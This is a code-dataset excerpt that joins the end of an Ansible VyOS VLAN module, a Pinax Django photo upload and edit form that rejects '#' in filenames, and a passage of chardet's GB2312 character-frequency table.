        delay=dict(default=10, type='int'),
        state=dict(default='present',
                   choices=['present', 'absent'])
    )
    aggregate_spec = deepcopy(element_spec)

    # remove default in aggregate spec, to handle common arguments
    remove_default_spec(aggregate_spec)

    argument_spec = dict(
        aggregate=dict(type='list', elements='dict', options=aggregate_spec),
        purge=dict(default=False, type='bool')
    )

    # Top-level params accept both the per-vlan options and the shared
    # vyos connection arguments.
    argument_spec.update(element_spec)
    argument_spec.update(vyos_argument_spec)

    required_one_of = [['vlan_id', 'aggregate'],
                       ['aggregate', 'interfaces', 'associated_interfaces']]
    mutually_exclusive = [['vlan_id', 'aggregate']]
    module = AnsibleModule(argument_spec=argument_spec,
                           supports_check_mode=True,
                           required_one_of=required_one_of,
                           mutually_exclusive=mutually_exclusive)

    # NOTE(review): `warnings` is never populated here, so the branch
    # below is currently dead -- presumably kept for parity with other
    # network modules.
    warnings = list()
    result = {'changed': False}
    if warnings:
        result['warnings'] = warnings

    # Desired state from params, current state from the device, then the
    # command diff between them.
    want = map_params_to_obj(module)
    have = map_config_to_obj(module)
    commands = map_obj_to_commands((want, have), module)
    result['commands'] = commands

    if commands:
        # In check mode, build but do not commit the configuration.
        commit = not module.check_mode
        load_config(module, commands, commit=commit)
        result['changed'] = True

    # Validate declarative-intent params (associated_interfaces) after
    # any change has been applied.
    check_declarative_intent_params(want, module, result)

    module.exit_json(**result)
| gpl-3.0 |
kevinr/750book-web | 750book-web-env/lib/python2.7/site-packages/pinax/apps/photos/forms.py | 2 | 1147 | from datetime import datetime
from django import forms
from django.utils.translation import ugettext_lazy as _
from pinax.apps.photos.models import Image
class PhotoUploadForm(forms.ModelForm):
    """Upload form for ``Image`` that validates the uploaded filename."""

    class Meta:
        model = Image
        # Fields set by the view / derived later, not by the uploader.
        exclude = ["member", "photoset", "title_slug", "effect", "crop_from"]

    def __init__(self, user=None, *args, **kwargs):
        # Remember the uploading user for use by callers of the form.
        self.user = user
        super(PhotoUploadForm, self).__init__(*args, **kwargs)

    def clean_image(self):
        uploaded = self.cleaned_data["image"]
        # Reject filenames containing '#'.
        if "#" in uploaded.name:
            raise forms.ValidationError(
                _("Image filename contains an invalid character: '#'. Please remove the character and try again."))
        return uploaded
class PhotoEditForm(forms.ModelForm):
    """Edit form for ``Image`` metadata; the image file itself is excluded."""

    class Meta:
        model = Image
        # The file and derived/view-managed fields cannot be edited here.
        exclude = ["member", "photoset", "title_slug", "effect", "crop_from", "image"]

    def __init__(self, user=None, *args, **kwargs):
        # Remember the editing user for use by callers of the form.
        self.user = user
        super(PhotoEditForm, self).__init__(*args, **kwargs)
| mit |
cubing/tnoodle | git-tools/requests/packages/chardet/gb2312freq.py | 3132 | 36011 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# GB2312 most frequently used character table
#
# Char to FreqOrder table , from hz6763
# 512 --> 0.79 -- 0.79
# 1024 --> 0.92 -- 0.13
# 2048 --> 0.98 -- 0.06
# 6768 --> 1.00 -- 0.02
#
# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79
# Random Distribution Ratio = 512 / (3755 - 512) = 0.157
#
# Typical Distribution Ratio is about 25% of the ideal one, still much higher than RDR
# NOTE(review): the derivation above gives an ideal ratio of 3.79 and says the
# typical ratio is ~25% of that (~0.95); 0.9 is the threshold actually used.
GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9
# Number of entries of the frequency-order table consulted during detection
# (the header notes 3755 frequent characters; presumably padded to 3760 —
# confirm against the prober that reads this constant).
GB2312_TABLE_SIZE = 3760
GB2312CharToFreqOrder = (
1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,
2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,
2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,
249,4088,1746,1873,2047,1774, 581,1813, 358,1174,3590,1014,1561,4844,2245, 670,
1636,3112, 889,1286, 953, 556,2327,3060,1290,3141, 613, 185,3477,1367, 850,3820,
1715,2428,2642,2303,2732,3041,2562,2648,3566,3946,1349, 388,3098,2091,1360,3585,
152,1687,1539, 738,1559, 59,1232,2925,2267,1388,1249,1741,1679,2960, 151,1566,
1125,1352,4271, 924,4296, 385,3166,4459, 310,1245,2850, 70,3285,2729,3534,3575,
2398,3298,3466,1960,2265, 217,3647, 864,1909,2084,4401,2773,1010,3269,5152, 853,
3051,3121,1244,4251,1895, 364,1499,1540,2313,1180,3655,2268, 562, 715,2417,3061,
544, 336,3768,2380,1752,4075, 950, 280,2425,4382, 183,2759,3272, 333,4297,2155,
1688,2356,1444,1039,4540, 736,1177,3349,2443,2368,2144,2225, 565, 196,1482,3406,
927,1335,4147, 692, 878,1311,1653,3911,3622,1378,4200,1840,2969,3149,2126,1816,
2534,1546,2393,2760, 737,2494, 13, 447, 245,2747, 38,2765,2129,2589,1079, 606,
360, 471,3755,2890, 404, 848, 699,1785,1236, 370,2221,1023,3746,2074,2026,2023,
2388,1581,2119, 812,1141,3091,2536,1519, 804,2053, 406,1596,1090, 784, 548,4414,
1806,2264,2936,1100, 343,4114,5096, 622,3358, 743,3668,1510,1626,5020,3567,2513,
3195,4115,5627,2489,2991, 24,2065,2697,1087,2719, 48,1634, 315, 68, 985,2052,
198,2239,1347,1107,1439, 597,2366,2172, 871,3307, 919,2487,2790,1867, 236,2570,
1413,3794, 906,3365,3381,1701,1982,1818,1524,2924,1205, 616,2586,2072,2004, 575,
253,3099, 32,1365,1182, 197,1714,2454,1201, 554,3388,3224,2748, 756,2587, 250,
2567,1507,1517,3529,1922,2761,2337,3416,1961,1677,2452,2238,3153, 615, 911,1506,
1474,2495,1265,1906,2749,3756,3280,2161, 898,2714,1759,3450,2243,2444, 563, 26,
3286,2266,3769,3344,2707,3677, 611,1402, 531,1028,2871,4548,1375, 261,2948, 835,
1190,4134, 353, 840,2684,1900,3082,1435,2109,1207,1674, 329,1872,2781,4055,2686,
2104, 608,3318,2423,2957,2768,1108,3739,3512,3271,3985,2203,1771,3520,1418,2054,
1681,1153, 225,1627,2929, 162,2050,2511,3687,1954, 124,1859,2431,1684,3032,2894,
585,4805,3969,2869,2704,2088,2032,2095,3656,2635,4362,2209, 256, 518,2042,2105,
3777,3657, 643,2298,1148,1779, 190, 989,3544, 414, 11,2135,2063,2979,1471, 403,
3678, 126, 770,1563, 671,2499,3216,2877, 600,1179, 307,2805,4937,1268,1297,2694,
252,4032,1448,1494,1331,1394, 127,2256, 222,1647,1035,1481,3056,1915,1048, 873,
3651, 210, 33,1608,2516, 200,1520, 415, 102, 0,3389,1287, 817, 91,3299,2940,
836,1814, 549,2197,1396,1669,2987,3582,2297,2848,4528,1070, 687, 20,1819, 121,
1552,1364,1461,1968,2617,3540,2824,2083, 177, 948,4938,2291, 110,4549,2066, 648,
3359,1755,2110,2114,4642,4845,1693,3937,3308,1257,1869,2123, 208,1804,3159,2992,
2531,2549,3361,2418,1350,2347,2800,2568,1291,2036,2680, 72, 842,1990, 212,1233,
1154,1586, 75,2027,3410,4900,1823,1337,2710,2676, 728,2810,1522,3026,4995, 157,
755,1050,4022, 710, 785,1936,2194,2085,1406,2777,2400, 150,1250,4049,1206, 807,
1910, 534, 529,3309,1721,1660, 274, 39,2827, 661,2670,1578, 925,3248,3815,1094,
4278,4901,4252, 41,1150,3747,2572,2227,4501,3658,4902,3813,3357,3617,2884,2258,
887, 538,4187,3199,1294,2439,3042,2329,2343,2497,1255, 107, 543,1527, 521,3478,
3568, 194,5062, 15, 961,3870,1241,1192,2664, 66,5215,3260,2111,1295,1127,2152,
3805,4135, 901,1164,1976, 398,1278, 530,1460, 748, 904,1054,1966,1426, 53,2909,
509, 523,2279,1534, 536,1019, 239,1685, 460,2353, 673,1065,2401,3600,4298,2272,
1272,2363, 284,1753,3679,4064,1695, 81, 815,2677,2757,2731,1386, 859, 500,4221,
2190,2566, 757,1006,2519,2068,1166,1455, 337,2654,3203,1863,1682,1914,3025,1252,
1409,1366, 847, 714,2834,2038,3209, 964,2970,1901, 885,2553,1078,1756,3049, 301,
1572,3326, 688,2130,1996,2429,1805,1648,2930,3421,2750,3652,3088, 262,1158,1254,
389,1641,1812, 526,1719, 923,2073,1073,1902, 468, 489,4625,1140, 857,2375,3070,
3319,2863, 380, 116,1328,2693,1161,2244, 273,1212,1884,2769,3011,1775,1142, 461,
3066,1200,2147,2212, 790, 702,2695,4222,1601,1058, 434,2338,5153,3640, 67,2360,
4099,2502, 618,3472,1329, 416,1132, 830,2782,1807,2653,3211,3510,1662, 192,2124,
296,3979,1739,1611,3684, 23, 118, 324, 446,1239,1225, 293,2520,3814,3795,2535,
3116, 17,1074, 467,2692,2201, 387,2922, 45,1326,3055,1645,3659,2817, 958, 243,
1903,2320,1339,2825,1784,3289, 356, 576, 865,2315,2381,3377,3916,1088,3122,1713,
1655, 935, 628,4689,1034,1327, 441, 800, 720, 894,1979,2183,1528,5289,2702,1071,
4046,3572,2399,1571,3281, 79, 761,1103, 327, 134, 758,1899,1371,1615, 879, 442,
215,2605,2579, 173,2048,2485,1057,2975,3317,1097,2253,3801,4263,1403,1650,2946,
814,4968,3487,1548,2644,1567,1285, 2, 295,2636, 97, 946,3576, 832, 141,4257,
3273, 760,3821,3521,3156,2607, 949,1024,1733,1516,1803,1920,2125,2283,2665,3180,
1501,2064,3560,2171,1592, 803,3518,1416, 732,3897,4258,1363,1362,2458, 119,1427,
602,1525,2608,1605,1639,3175, 694,3064, 10, 465, 76,2000,4846,4208, 444,3781,
1619,3353,2206,1273,3796, 740,2483, 320,1723,2377,3660,2619,1359,1137,1762,1724,
2345,2842,1850,1862, 912, 821,1866, 612,2625,1735,2573,3369,1093, 844, 89, 937,
930,1424,3564,2413,2972,1004,3046,3019,2011, 711,3171,1452,4178, 428, 801,1943,
432, 445,2811, 206,4136,1472, 730, 349, 73, 397,2802,2547, 998,1637,1167, 789,
396,3217, 154,1218, 716,1120,1780,2819,4826,1931,3334,3762,2139,1215,2627, 552,
3664,3628,3232,1405,2383,3111,1356,2652,3577,3320,3101,1703, 640,1045,1370,1246,
4996, 371,1575,2436,1621,2210, 984,4033,1734,2638, 16,4529, 663,2755,3255,1451,
3917,2257,1253,1955,2234,1263,2951, 214,1229, 617, 485, 359,1831,1969, 473,2310,
750,2058, 165, 80,2864,2419, 361,4344,2416,2479,1134, 796,3726,1266,2943, 860,
2715, 938, 390,2734,1313,1384, 248, 202, 877,1064,2854, 522,3907, 279,1602, 297,
2357, 395,3740, 137,2075, 944,4089,2584,1267,3802, 62,1533,2285, 178, 176, 780,
2440, 201,3707, 590, 478,1560,4354,2117,1075, 30, 74,4643,4004,1635,1441,2745,
776,2596, 238,1077,1692,1912,2844, 605, 499,1742,3947, 241,3053, 980,1749, 936,
2640,4511,2582, 515,1543,2162,5322,2892,2993, 890,2148,1924, 665,1827,3581,1032,
968,3163, 339,1044,1896, 270, 583,1791,1720,4367,1194,3488,3669, 43,2523,1657,
163,2167, 290,1209,1622,3378, 550, 634,2508,2510, 695,2634,2384,2512,1476,1414,
220,1469,2341,2138,2852,3183,2900,4939,2865,3502,1211,3680, 854,3227,1299,2976,
3172, 186,2998,1459, 443,1067,3251,1495, 321,1932,3054, 909, 753,1410,1828, 436,
2441,1119,1587,3164,2186,1258, 227, 231,1425,1890,3200,3942, 247, 959, 725,5254,
2741, 577,2158,2079, 929, 120, 174, 838,2813, 591,1115, 417,2024, 40,3240,1536,
1037, 291,4151,2354, 632,1298,2406,2500,3535,1825,1846,3451, 205,1171, 345,4238,
18,1163, 811, 685,2208,1217, 425,1312,1508,1175,4308,2552,1033, 587,1381,3059,
2984,3482, 340,1316,4023,3972, 792,3176, 519, 777,4690, 918, 933,4130,2981,3741,
90,3360,2911,2200,5184,4550, 609,3079,2030, 272,3379,2736, 363,3881,1130,1447,
286, 779, 357,1169,3350,3137,1630,1220,2687,2391, 747,1277,3688,2618,2682,2601,
1156,3196,5290,4034,3102,1689,3596,3128, 874, 219,2783, 798, 508,1843,2461, 269,
1658,1776,1392,1913,2983,3287,2866,2159,2372, 829,4076, 46,4253,2873,1889,1894,
915,1834,1631,2181,2318, 298, 664,2818,3555,2735, 954,3228,3117, 527,3511,2173,
681,2712,3033,2247,2346,3467,1652, 155,2164,3382, 113,1994, 450, 899, 494, 994,
1237,2958,1875,2336,1926,3727, 545,1577,1550, 633,3473, 204,1305,3072,2410,1956,
2471, 707,2134, 841,2195,2196,2663,3843,1026,4940, 990,3252,4997, 368,1092, 437,
3212,3258,1933,1829, 675,2977,2893, 412, 943,3723,4644,3294,3283,2230,2373,5154,
2389,2241,2661,2323,1404,2524, 593, 787, 677,3008,1275,2059, 438,2709,2609,2240,
2269,2246,1446, 36,1568,1373,3892,1574,2301,1456,3962, 693,2276,5216,2035,1143,
2720,1919,1797,1811,2763,4137,2597,1830,1699,1488,1198,2090, 424,1694, 312,3634,
3390,4179,3335,2252,1214, 561,1059,3243,2295,2561, 975,5155,2321,2751,3772, 472,
1537,3282,3398,1047,2077,2348,2878,1323,3340,3076, 690,2906, 51, 369, 170,3541,
1060,2187,2688,3670,2541,1083,1683, 928,3918, 459, 109,4427, 599,3744,4286, 143,
2101,2730,2490, 82,1588,3036,2121, 281,1860, 477,4035,1238,2812,3020,2716,3312,
1530,2188,2055,1317, 843, 636,1808,1173,3495, 649, 181,1002, 147,3641,1159,2414,
3750,2289,2795, 813,3123,2610,1136,4368, 5,3391,4541,2174, 420, 429,1728, 754,
1228,2115,2219, 347,2223,2733, 735,1518,3003,2355,3134,1764,3948,3329,1888,2424,
1001,1234,1972,3321,3363,1672,1021,1450,1584, 226, 765, 655,2526,3404,3244,2302,
3665, 731, 594,2184, 319,1576, 621, 658,2656,4299,2099,3864,1279,2071,2598,2739,
795,3086,3699,3908,1707,2352,2402,1382,3136,2475,1465,4847,3496,3865,1085,3004,
2591,1084, 213,2287,1963,3565,2250, 822, 793,4574,3187,1772,1789,3050, 595,1484,
1959,2770,1080,2650, 456, 422,2996, 940,3322,4328,4345,3092,2742, 965,2784, 739,
4124, 952,1358,2498,2949,2565, 332,2698,2378, 660,2260,2473,4194,3856,2919, 535,
1260,2651,1208,1428,1300,1949,1303,2942, 433,2455,2450,1251,1946, 614,1269, 641,
1306,1810,2737,3078,2912, 564,2365,1419,1415,1497,4460,2367,2185,1379,3005,1307,
3218,2175,1897,3063, 682,1157,4040,4005,1712,1160,1941,1399, 394, 402,2952,1573,
1151,2986,2404, 862, 299,2033,1489,3006, 346, 171,2886,3401,1726,2932, 168,2533,
47,2507,1030,3735,1145,3370,1395,1318,1579,3609,4560,2857,4116,1457,2529,1965,
504,1036,2690,2988,2405, 745,5871, 849,2397,2056,3081, 863,2359,3857,2096, 99,
1397,1769,2300,4428,1643,3455,1978,1757,3718,1440, 35,4879,3742,1296,4228,2280,
160,5063,1599,2013, 166, 520,3479,1646,3345,3012, 490,1937,1545,1264,2182,2505,
1096,1188,1369,1436,2421,1667,2792,2460,1270,2122, 727,3167,2143, 806,1706,1012,
1800,3037, 960,2218,1882, 805, 139,2456,1139,1521, 851,1052,3093,3089, 342,2039,
744,5097,1468,1502,1585,2087, 223, 939, 326,2140,2577, 892,2481,1623,4077, 982,
3708, 135,2131, 87,2503,3114,2326,1106, 876,1616, 547,2997,2831,2093,3441,4530,
4314, 9,3256,4229,4148, 659,1462,1986,1710,2046,2913,2231,4090,4880,5255,3392,
3274,1368,3689,4645,1477, 705,3384,3635,1068,1529,2941,1458,3782,1509, 100,1656,
2548, 718,2339, 408,1590,2780,3548,1838,4117,3719,1345,3530, 717,3442,2778,3220,
2898,1892,4590,3614,3371,2043,1998,1224,3483, 891, 635, 584,2559,3355, 733,1766,
1729,1172,3789,1891,2307, 781,2982,2271,1957,1580,5773,2633,2005,4195,3097,1535,
3213,1189,1934,5693,3262, 586,3118,1324,1598, 517,1564,2217,1868,1893,4445,3728,
2703,3139,1526,1787,1992,3882,2875,1549,1199,1056,2224,1904,2711,5098,4287, 338,
1993,3129,3489,2689,1809,2815,1997, 957,1855,3898,2550,3275,3057,1105,1319, 627,
1505,1911,1883,3526, 698,3629,3456,1833,1431, 746, 77,1261,2017,2296,1977,1885,
125,1334,1600, 525,1798,1109,2222,1470,1945, 559,2236,1186,3443,2476,1929,1411,
2411,3135,1777,3372,2621,1841,1613,3229, 668,1430,1839,2643,2916, 195,1989,2671,
2358,1387, 629,3205,2293,5256,4439, 123,1310, 888,1879,4300,3021,3605,1003,1162,
3192,2910,2010, 140,2395,2859, 55,1082,2012,2901, 662, 419,2081,1438, 680,2774,
4654,3912,1620,1731,1625,5035,4065,2328, 512,1344, 802,5443,2163,2311,2537, 524,
3399, 98,1155,2103,1918,2606,3925,2816,1393,2465,1504,3773,2177,3963,1478,4346,
180,1113,4655,3461,2028,1698, 833,2696,1235,1322,1594,4408,3623,3013,3225,2040,
3022, 541,2881, 607,3632,2029,1665,1219, 639,1385,1686,1099,2803,3231,1938,3188,
2858, 427, 676,2772,1168,2025, 454,3253,2486,3556, 230,1950, 580, 791,1991,1280,
1086,1974,2034, 630, 257,3338,2788,4903,1017, 86,4790, 966,2789,1995,1696,1131,
259,3095,4188,1308, 179,1463,5257, 289,4107,1248, 42,3413,1725,2288, 896,1947,
774,4474,4254, 604,3430,4264, 392,2514,2588, 452, 237,1408,3018, 988,4531,1970,
3034,3310, 540,2370,1562,1288,2990, 502,4765,1147, 4,1853,2708, 207, 294,2814,
4078,2902,2509, 684, 34,3105,3532,2551, 644, 709,2801,2344, 573,1727,3573,3557,
2021,1081,3100,4315,2100,3681, 199,2263,1837,2385, 146,3484,1195,2776,3949, 997,
1939,3973,1008,1091,1202,1962,1847,1149,4209,5444,1076, 493, 117,5400,2521, 972,
1490,2934,1796,4542,2374,1512,2933,2657, 413,2888,1135,2762,2314,2156,1355,2369,
766,2007,2527,2170,3124,2491,2593,2632,4757,2437, 234,3125,3591,1898,1750,1376,
1942,3468,3138, 570,2127,2145,3276,4131, 962, 132,1445,4196, 19, 941,3624,3480,
3366,1973,1374,4461,3431,2629, 283,2415,2275, 808,2887,3620,2112,2563,1353,3610,
955,1089,3103,1053, 96, 88,4097, 823,3808,1583, 399, 292,4091,3313, 421,1128,
642,4006, 903,2539,1877,2082, 596, 29,4066,1790, 722,2157, 130, 995,1569, 769,
1485, 464, 513,2213, 288,1923,1101,2453,4316, 133, 486,2445, 50, 625, 487,2207,
57, 423, 481,2962, 159,3729,1558, 491, 303, 482, 501, 240,2837, 112,3648,2392,
1783, 362, 8,3433,3422, 610,2793,3277,1390,1284,1654, 21,3823, 734, 367, 623,
193, 287, 374,1009,1483, 816, 476, 313,2255,2340,1262,2150,2899,1146,2581, 782,
2116,1659,2018,1880, 255,3586,3314,1110,2867,2137,2564, 986,2767,5185,2006, 650,
158, 926, 762, 881,3157,2717,2362,3587, 306,3690,3245,1542,3077,2427,1691,2478,
2118,2985,3490,2438, 539,2305, 983, 129,1754, 355,4201,2386, 827,2923, 104,1773,
2838,2771, 411,2905,3919, 376, 767, 122,1114, 828,2422,1817,3506, 266,3460,1007,
1609,4998, 945,2612,4429,2274, 726,1247,1964,2914,2199,2070,4002,4108, 657,3323,
1422, 579, 455,2764,4737,1222,2895,1670, 824,1223,1487,2525, 558, 861,3080, 598,
2659,2515,1967, 752,2583,2376,2214,4180, 977, 704,2464,4999,2622,4109,1210,2961,
819,1541, 142,2284, 44, 418, 457,1126,3730,4347,4626,1644,1876,3671,1864, 302,
1063,5694, 624, 723,1984,3745,1314,1676,2488,1610,1449,3558,3569,2166,2098, 409,
1011,2325,3704,2306, 818,1732,1383,1824,1844,3757, 999,2705,3497,1216,1423,2683,
2426,2954,2501,2726,2229,1475,2554,5064,1971,1794,1666,2014,1343, 783, 724, 191,
2434,1354,2220,5065,1763,2752,2472,4152, 131, 175,2885,3434, 92,1466,4920,2616,
3871,3872,3866, 128,1551,1632, 669,1854,3682,4691,4125,1230, 188,2973,3290,1302,
1213, 560,3266, 917, 763,3909,3249,1760, 868,1958, 764,1782,2097, 145,2277,3774,
4462, 64,1491,3062, 971,2132,3606,2442, 221,1226,1617, 218, 323,1185,3207,3147,
571, 619,1473,1005,1744,2281, 449,1887,2396,3685, 275, 375,3816,1743,3844,3731,
845,1983,2350,4210,1377, 773, 967,3499,3052,3743,2725,4007,1697,1022,3943,1464,
3264,2855,2722,1952,1029,2839,2467, 84,4383,2215, 820,1391,2015,2448,3672, 377,
1948,2168, 797,2545,3536,2578,2645, 94,2874,1678, 405,1259,3071, 771, 546,1315,
470,1243,3083, 895,2468, 981, 969,2037, 846,4181, 653,1276,2928, 14,2594, 557,
3007,2474, 156, 902,1338,1740,2574, 537,2518, 973,2282,2216,2433,1928, 138,2903,
1293,2631,1612, 646,3457, 839,2935, 111, 496,2191,2847, 589,3186, 149,3994,2060,
4031,2641,4067,3145,1870, 37,3597,2136,1025,2051,3009,3383,3549,1121,1016,3261,
1301, 251,2446,2599,2153, 872,3246, 637, 334,3705, 831, 884, 921,3065,3140,4092,
2198,1944, 246,2964, 108,2045,1152,1921,2308,1031, 203,3173,4170,1907,3890, 810,
1401,2003,1690, 506, 647,1242,2828,1761,1649,3208,2249,1589,3709,2931,5156,1708,
498, 666,2613, 834,3817,1231, 184,2851,1124, 883,3197,2261,3710,1765,1553,2658,
1178,2639,2351, 93,1193, 942,2538,2141,4402, 235,1821, 870,1591,2192,1709,1871,
3341,1618,4126,2595,2334, 603, 651, 69, 701, 268,2662,3411,2555,1380,1606, 503,
448, 254,2371,2646, 574,1187,2309,1770, 322,2235,1292,1801, 305, 566,1133, 229,
2067,2057, 706, 167, 483,2002,2672,3295,1820,3561,3067, 316, 378,2746,3452,1112,
136,1981, 507,1651,2917,1117, 285,4591, 182,2580,3522,1304, 335,3303,1835,2504,
1795,1792,2248, 674,1018,2106,2449,1857,2292,2845, 976,3047,1781,2600,2727,1389,
1281, 52,3152, 153, 265,3950, 672,3485,3951,4463, 430,1183, 365, 278,2169, 27,
1407,1336,2304, 209,1340,1730,2202,1852,2403,2883, 979,1737,1062, 631,2829,2542,
3876,2592, 825,2086,2226,3048,3625, 352,1417,3724, 542, 991, 431,1351,3938,1861,
2294, 826,1361,2927,3142,3503,1738, 463,2462,2723, 582,1916,1595,2808, 400,3845,
3891,2868,3621,2254, 58,2492,1123, 910,2160,2614,1372,1603,1196,1072,3385,1700,
3267,1980, 696, 480,2430, 920, 799,1570,2920,1951,2041,4047,2540,1321,4223,2469,
3562,2228,1271,2602, 401,2833,3351,2575,5157, 907,2312,1256, 410, 263,3507,1582,
996, 678,1849,2316,1480, 908,3545,2237, 703,2322, 667,1826,2849,1531,2604,2999,
2407,3146,2151,2630,1786,3711, 469,3542, 497,3899,2409, 858, 837,4446,3393,1274,
786, 620,1845,2001,3311, 484, 308,3367,1204,1815,3691,2332,1532,2557,1842,2020,
2724,1927,2333,4440, 567, 22,1673,2728,4475,1987,1858,1144,1597, 101,1832,3601,
12, 974,3783,4391, 951,1412, 1,3720, 453,4608,4041, 528,1041,1027,3230,2628,
1129, 875,1051,3291,1203,2262,1069,2860,2799,2149,2615,3278, 144,1758,3040, 31,
475,1680, 366,2685,3184, 311,1642,4008,2466,5036,1593,1493,2809, 216,1420,1668,
233, 304,2128,3284, 232,1429,1768,1040,2008,3407,2740,2967,2543, 242,2133, 778,
1565,2022,2620, 505,2189,2756,1098,2273, 372,1614, 708, 553,2846,2094,2278, 169,
3626,2835,4161, 228,2674,3165, 809,1454,1309, 466,1705,1095, 900,3423, 880,2667,
3751,5258,2317,3109,2571,4317,2766,1503,1342, 866,4447,1118, 63,2076, 314,1881,
1348,1061, 172, 978,3515,1747, 532, 511,3970, 6, 601, 905,2699,3300,1751, 276,
1467,3725,2668, 65,4239,2544,2779,2556,1604, 578,2451,1802, 992,2331,2624,1320,
3446, 713,1513,1013, 103,2786,2447,1661, 886,1702, 916, 654,3574,2031,1556, 751,
2178,2821,2179,1498,1538,2176, 271, 914,2251,2080,1325, 638,1953,2937,3877,2432,
2754, 95,3265,1716, 260,1227,4083, 775, 106,1357,3254, 426,1607, 555,2480, 772,
1985, 244,2546, 474, 495,1046,2611,1851,2061, 71,2089,1675,2590, 742,3758,2843,
3222,1433, 267,2180,2576,2826,2233,2092,3913,2435, 956,1745,3075, 856,2113,1116,
451, 3,1988,2896,1398, 993,2463,1878,2049,1341,2718,2721,2870,2108, 712,2904,
4363,2753,2324, 277,2872,2349,2649, 384, 987, 435, 691,3000, 922, 164,3939, 652,
1500,1184,4153,2482,3373,2165,4848,2335,3775,3508,3154,2806,2830,1554,2102,1664,
2530,1434,2408, 893,1547,2623,3447,2832,2242,2532,3169,2856,3223,2078, 49,3770,
3469, 462, 318, 656,2259,3250,3069, 679,1629,2758, 344,1138,1104,3120,1836,1283,
3115,2154,1437,4448, 934, 759,1999, 794,2862,1038, 533,2560,1722,2342, 855,2626,
1197,1663,4476,3127, 85,4240,2528, 25,1111,1181,3673, 407,3470,4561,2679,2713,
768,1925,2841,3986,1544,1165, 932, 373,1240,2146,1930,2673, 721,4766, 354,4333,
391,2963, 187, 61,3364,1442,1102, 330,1940,1767, 341,3809,4118, 393,2496,2062,
2211, 105, 331, 300, 439, 913,1332, 626, 379,3304,1557, 328, 689,3952, 309,1555,
931, 317,2517,3027, 325, 569, 686,2107,3084, 60,1042,1333,2794, 264,3177,4014,
1628, 258,3712, 7,4464,1176,1043,1778, 683, 114,1975, 78,1492, 383,1886, 510,
386, 645,5291,2891,2069,3305,4138,3867,2939,2603,2493,1935,1066,1848,3588,1015,
1282,1289,4609, 697,1453,3044,2666,3611,1856,2412, 54, 719,1330, 568,3778,2459,
1748, 788, 492, 551,1191,1000, 488,3394,3763, 282,1799, 348,2016,1523,3155,2390,
1049, 382,2019,1788,1170, 729,2968,3523, 897,3926,2785,2938,3292, 350,2319,3238,
1718,1717,2655,3453,3143,4465, 161,2889,2980,2009,1421, 56,1908,1640,2387,2232,
1917,1874,2477,4921, 148, 83,3438, 592,4245,2882,1822,1055, 741, 115,1496,1624,
381,1638,4592,1020, 516,3214, 458, 947,4575,1432, 211,1514,2926,1865,2142, 189,
852,1221,1400,1486, 882,2299,4036, 351, 28,1122, 700,6479,6480,6481,6482,6483, # last 512
#Everything below is of no interest for detection purpose
5508,6484,3900,3414,3974,4441,4024,3537,4037,5628,5099,3633,6485,3148,6486,3636,
5509,3257,5510,5973,5445,5872,4941,4403,3174,4627,5873,6276,2286,4230,5446,5874,
5122,6102,6103,4162,5447,5123,5323,4849,6277,3980,3851,5066,4246,5774,5067,6278,
3001,2807,5695,3346,5775,5974,5158,5448,6487,5975,5976,5776,3598,6279,5696,4806,
4211,4154,6280,6488,6489,6490,6281,4212,5037,3374,4171,6491,4562,4807,4722,4827,
5977,6104,4532,4079,5159,5324,5160,4404,3858,5359,5875,3975,4288,4610,3486,4512,
5325,3893,5360,6282,6283,5560,2522,4231,5978,5186,5449,2569,3878,6284,5401,3578,
4415,6285,4656,5124,5979,2506,4247,4449,3219,3417,4334,4969,4329,6492,4576,4828,
4172,4416,4829,5402,6286,3927,3852,5361,4369,4830,4477,4867,5876,4173,6493,6105,
4657,6287,6106,5877,5450,6494,4155,4868,5451,3700,5629,4384,6288,6289,5878,3189,
4881,6107,6290,6495,4513,6496,4692,4515,4723,5100,3356,6497,6291,3810,4080,5561,
3570,4430,5980,6498,4355,5697,6499,4724,6108,6109,3764,4050,5038,5879,4093,3226,
6292,5068,5217,4693,3342,5630,3504,4831,4377,4466,4309,5698,4431,5777,6293,5778,
4272,3706,6110,5326,3752,4676,5327,4273,5403,4767,5631,6500,5699,5880,3475,5039,
6294,5562,5125,4348,4301,4482,4068,5126,4593,5700,3380,3462,5981,5563,3824,5404,
4970,5511,3825,4738,6295,6501,5452,4516,6111,5881,5564,6502,6296,5982,6503,4213,
4163,3454,6504,6112,4009,4450,6113,4658,6297,6114,3035,6505,6115,3995,4904,4739,
4563,4942,4110,5040,3661,3928,5362,3674,6506,5292,3612,4791,5565,4149,5983,5328,
5259,5021,4725,4577,4564,4517,4364,6298,5405,4578,5260,4594,4156,4157,5453,3592,
3491,6507,5127,5512,4709,4922,5984,5701,4726,4289,6508,4015,6116,5128,4628,3424,
4241,5779,6299,4905,6509,6510,5454,5702,5780,6300,4365,4923,3971,6511,5161,3270,
3158,5985,4100, 867,5129,5703,6117,5363,3695,3301,5513,4467,6118,6512,5455,4232,
4242,4629,6513,3959,4478,6514,5514,5329,5986,4850,5162,5566,3846,4694,6119,5456,
4869,5781,3779,6301,5704,5987,5515,4710,6302,5882,6120,4392,5364,5705,6515,6121,
6516,6517,3736,5988,5457,5989,4695,2457,5883,4551,5782,6303,6304,6305,5130,4971,
6122,5163,6123,4870,3263,5365,3150,4871,6518,6306,5783,5069,5706,3513,3498,4409,
5330,5632,5366,5458,5459,3991,5990,4502,3324,5991,5784,3696,4518,5633,4119,6519,
